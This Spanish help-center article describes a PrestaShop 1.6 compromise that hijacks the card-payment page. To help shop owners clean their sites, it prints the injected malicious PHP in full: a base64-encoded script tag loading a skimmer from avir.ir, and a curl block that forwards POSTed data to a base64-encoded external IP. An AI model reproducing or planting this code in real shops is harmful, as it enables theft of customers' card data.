Ir al contenido principal
Todas las coleccionesPrestaShopPrestaShop
PrestaShop 1.6 hack favicon.js avir.ir pagina pedidos con tarjeta
PrestaShop 1.6 hack favicon.js avir.ir pagina pedidos con tarjeta
Javier Galeote avatar
Escrito por Javier Galeote
Actualizado hace más de 5 meses

En el código fuente de la web de PrestaShop aparece al final un código extraño que hace saltar algunos antivirus como el Malware Bytes:

Este problema surge por un problema de seguridad de la versión de PrestaShop 1.6 o de algún módulo de terceros, aún no está claro.

El código inyectado provoca que el pago con tarjeta de la tienda cambie y se sustituya por otro:

Para solucionarlo temporalmente debes revisar los archivos:

  • classes/controller/Controller.php

  • classes/controller/AdminController.php

Y buscar y eliminar los siguientes bloques de códigos:

$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');
try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

Más info sobre este problema en el Foro Oficial de PrestaShop:

¿Ha quedado contestada tu pregunta?